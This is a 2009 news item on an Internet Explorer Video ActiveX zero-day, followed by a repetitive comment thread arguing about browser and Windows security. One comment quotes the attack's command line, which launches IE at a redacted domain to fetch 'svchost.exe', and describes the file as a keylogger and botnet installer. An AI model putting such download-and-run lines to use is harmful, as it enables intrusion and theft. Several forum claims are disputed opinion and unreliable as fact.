A very critical security vulnerability has been discovered without a fix for it yet. The exploit can hijack a computer remotely if the victim simply visits a compromised web site. The attack allows hackers to exploit a hole into the victims computer through Microsoft's Video ActiveX Control.The "zero day" vulnerability affects only Internet Explorer users via compromised web sites through part of its software used to play videos. The exploit can only attack users running Windows XP and Windows Server 2003 using the msvidctl.dll file that hosts this ActiveX Control. Microsoft recommends removing support for this ActiveX Control within Internet Explorer.
A patch for the exploit could take months to ready, so for now a temporary work around has been posted on Microsoft's support web site under the "Fix it" feature. Users can enable or disable the work around through Microsoft's web site.
Microsoft warns Windows XP and Windows Server 2003 users to enable the temporary workaround for now and also advises Windows Vista and Windows Server 2008 users to take these steps as a precaution. Internet Explorer 6 and 7 users are at risk but not Internet Explorer 8 users.
Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.
:facepalm:
IE 6/7 are affected on windows XP/Server 2003. Fix=Update your ****.
I guess other browsers don't get security vulnerabilities either eh? What twisted world do you live in?
1) Yes
2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome
3) The exploit is in the OS level ActiveX Control, not the BROWSERS
4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.
* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.
---
So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...
2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome
3) The exploit is in the OS level ActiveX Control, not the BROWSERS
4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.
* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.
---
So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...
Im aware of this, but I prefer Firefox because of addons like Firegestures (Or Opera) and adblock. Jus sayin or else Id be on IE8.
2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome
3) The exploit is in the OS level ActiveX Control, not the BROWSERS
4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.
* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.
---
So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...
Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.
Maybe you forget who introduced the complete travesty that is ActiveX onto us?
4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.
+1
The problem with Firefox is that you only need to get arbitrary code running in the browser process and it's game over.
2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome
3) The exploit is in the OS level ActiveX Control, not the BROWSERS
4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.
* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.
---
So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...
Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.
Maybe you forget who introduced the complete travesty that is ActiveX onto us?
4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.
Windows 7 is built on Windows NT, or an I missing something here?
u mean ff 3.5 + win7=holyness
When i use IE8 on my core 2 duo with 4GB ram running windows 7 x64 it lags so bad that i get frustrated
When i use IE8 on my core 2 duo with 4GB ram running windows 7 x64 it lags so bad that i get frustrated
I agree. The lag is utterly ridiculous. Something as simple as opening a new (Empty) tab takes forever... :-
Nope. You're not missing anything. He's just horribly misinformed.
Maybe you forget who introduced the complete travesty that is ActiveX onto us?
4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.
It's called Protected Mode. Might wanna get your facts straight there, smart guy.
Nope.
We might as well take his suggestion all the way and claim Windows 7 x64 still has MS-DOS sitting at the bottom somewhere.
It is win3.1 all the way down, baby.
You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)
And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.
So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.
You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)
And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.
So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.
Big wow. An OS with bugs in it with various GUI similarities between versions, and a COMMERCIAL company trying to save money by recycling code. Who'da thought it.
/sarcasm
And all that's going to change as they're meant to be starting from (pretty much) scratch with Midori due for release after Windows 8 IIRC.
Yes, they will eventually ditch Windows for this managed-code based OS (and yes, I'm dubious about how well it will perform because of this).
2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome
3) The exploit is in the OS level ActiveX Control, not the BROWSERS
4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.
* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.
---
So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...
Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.
Maybe you forget who introduced the complete travesty that is ActiveX onto us?
4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.
Wow, both of these posts are written by people who would rather argue than be honest. Over the last 2 years IE has had about the same number of vulnerabilities and patches as other popular browsers. Yes, there are studies if you don't want to take my word for it but Google them yourself, I am not going to spoon feed anyone. To this point number 4, wow, I hope that person doesn't actually do any IT work either. Windows NT has always been built around a secure execution model similar to UNIX. The Windows 9x system (which shares some roots from 3.1) was not. The last version of Windows 9x was ME. Starting with Windows 2000 (which was primarily marketed as a business OS) home users had an operating system available based on the NT code base, XP put it out there to the masses.
You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)
And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.
So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.
Dude!! You are so clueless I'm not sure I should even reply. Windows NT was build from the ground up by a joint effort between MS and IBM (IBM pulled out before the project was finished and used their work on the project to build their own OS2, then the two sued each other for stealing the other’s work from the failed collaboration, but that is a side story). Yes, the GUI was the same, the goal of Windows NT was to build a stable and secure OS, not redesign the user interface. So yes, they used a lot of the same helper apps (program manager, file manager, in later versions explorer.exe) but the way the system works under the covers is 100% different. It doesn’t take much digging around to see this first hand.
To the point about the image vulnerability, that has nothing to do with the OS...but it sounds like you do not understand the difference between an operating system and an application so you might not be able to follow. MS had a common code library for working with JPG images, that library was used by any MS app that needed JPG support. When a vulnerability was found, yes, it effected everything that used that code library including pictures viewer applications from both OS (but not the core OS its self) and a whole slew of other MS applications. Not that you will understand this, but that was a user level vulnerability, not a kernel or system level, it had nothing to do with the operating system.
From a simple point of view, yes, clearly everything that comes on the install media could be considered part of the OS and from that point of view, yes, there still are some included applications that use the same code as those included with Windows 3.1 or 95 (calc, paint, backup, wordpad, Outlook Express and even Internet Explorer are a few that come to mind), but none of these applications have anything to do with OS security in the manner you are implying.
You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)
And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.
So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.
No, NT is a brand new kernel. It doesn't contain parts of 3.1. Just because they use similar resource files for the UI bits doesn't imply at all that the kernel is built on it. Heck, NT isn't even 16 bit like Windows 3.1 was. Additionally, Windows 3.1 was built on DOS, which NT wasn't.
Hah DeadCell, I LOL'd at your two posts. nicee.
+1
Usually for Corporate policies but also for computer that runs fine and for customers that are pretty afraid to do some complex job (such updating their pc"
The constant evolution (and involution) of the computer system must stop at some point, it is chaotic to think to switch products almost every 3 years.
Not using IE = maximum security + peace of mind
<3 Application Protection, teminated the exe and deleted it... Looked at it a bit in notepad, it's got registry functions, along with the generic clipboard, internet, etc. so looks like trojans are being put on large video sites already
You've got plenty of choices these days too.
But, it's good to know that it's a browser-wide security issue.
Move the close button to the right with about:config and set browser.tabs.closebuttons to 3
I found that in the first result of my first Google search. If there are other things you don't like about newer versions of Firefox I'm sure you can fix those too.
Better safe than sorry
Not only do you have ASLR/DEP, but IE runs in protected mode in Vista and Win7. This means that even if you are exposed to any unknown type of malware, it can't do anything to the computer. Think of protected mode as teflon or a nice sandbox...
+1. I don't know why anyone would continue to use IE6.
I seem to have heard about many exploits concerning Firefox
Last edited by shockz on 07 Jul 2009 - 02:18
Well, you'll probably be warned by Apple in the next Mac vs PC commercial.
Last edited by Jimmy422 on 07 Jul 2009 - 03:23
C:\[% programfiles%]\Internet Explorer\iexplore.exe "http://<domain removed>/wm/svchost.exe
The goal of this attack is to run the file "svchost.exe" on vulnerable systems. The file is a Keylogger to record all keystrokes on your machine and also binds the machine into a C & C / BOT networks. The code retrieves several accompanying components installing a cocktail of malicious code on the compromised system
If you had bothered to read up on this you would know that all the infected websites redirect traffic to one domain.
So can you please explain how this can never be used again? How hard is it to setup another domain?? Let me tell you, not very hard.
I am not sure what you are saying, are you saying that we don't have to worry about this anymore?
they is teh ebil!
why did they have to conveniently discover a vulnerability now?
Yeah, but since ie is tied so much in the OS, it is a lot more vulnerable. Plus FF vulnerabilities have never been as severe, and there were never as many of them.
That's not true, any app with the right level of access or running on the right user account with enough access can fully take control of your system. As for the IE "tie-in" that's only the base rendering engine (this is not ActiveX) that is used for the help system in XP and other apps as well.
Any exploited app, even AV software that's suppose to be protecting you, if it's got a hole, can be used to screw your system over.
It's naive to think only IE or only apps installed with Windows by MS can do damage.
But IE is not tied into the system anymore, not since IE7, and using IE8 on Vista and 7 is the most secure way to browse the internet because of the level of protection you have.
*rolleyes* IE hasn't been tied into the OS since IE7.
But they seem to always get fixed the next day. MS hasn't been able to secure ActiveX in over a decade now.
ActiveX = FAIL
Why do you keep bringing this up, this isn't going to protect you from this exploit. All you need is a buffer overflow, and it is possible to elevate your process. And MS hand out buffer overflows like it is free candy. Sure, it is a great idea, somebody has to hand it to them. Who would have thought of SEPERATING THE BROWSER FROM THE OS... oh yeah, every other single browser manufacturer. Not even Apple tie safari to there OS, only Microsoft.
Uh, if this is so possible, how come Protected Mode hasn't been circumvented yet? Oh right, because other hackers aren't as smart as you.
IE7/8 just look 'wrong' on XP, they don't fit in.
... with a chair!
Or 7, but I agree. XP needs to die.
Good God man! That... would be bad.
Oh I agree, and when MS release a decent OS we will start looking at it. W7 looks good, but who knows until it is actually released. And funnily enough, the same guys here who love W7, loved Vista, so it wouldn't take anything you guys say as serious.
Are you serious? A lot of the really annoying Windows 7 fanboys around here now are either former or still current XP fanboys.
WELL as you cleverly pointed out, Windows 7 is based directly off Vista, so it stands to reason that many of the Windows 7 fanboys (myself included) liked Vista (myself also included). Surprised much?
And we have a pretty good idea 7 will be good cos of all the release candidates leaking out of microsoft like rain. If you don't like it, get a Mac or install Linux. If you can't do that, google is ur friend, there's no crying in open source remember!!
Some people don't have a choice, particularly if it's a corporate PC... Shooting people for running IE6 because that is what is on their work pc and they often are unable to install anything else isn't nice
At where I use to work, they still have XP SP1, IE 6. They won't upgrade further because their IT department says that "any Windows OS beyond XP SP1 is not a safe environment to operate any size business."
That's special right there
I thought that was pretty special myself. I wonder how a company that size (and it's a mid-size company with 4 plants in the U.S.) can operate with an IT department that obviously have no clue at all.
Wow, at least they are honest... and could do with a lot more IT departments deciding being this honest. Of course the real reason is more likely that they can't afford moving to anything, what with all the testing and rewriting applications they would have to do, since not even ie7 is compatible with ie6. What a joke.
And that, my friend, is what's really going to hold the internet back. Companies either unwilling or unable to rewrite their web apps for something that's not IE6.
Therefore, if there are NO "by-design uses" why in the world did they leave that ActiveX Control active all this time? They have had YEARS to disable unused ActiveX controls! Now maybe I'm totally in left field, but doesn't MS control the valid Active X controls?
How many other Active X Controls with no "by-design uses" are still active and therefore ready to be the next zero-day news story?
Oh NOES!! Who would have guessed?! The Shock! The horror!
Commenting has either been disabled on this article or you are not logged in. Click here to login or register, its free!
Note: Anonymous commenting is disabled in order to keep the quality of responses to a high standard.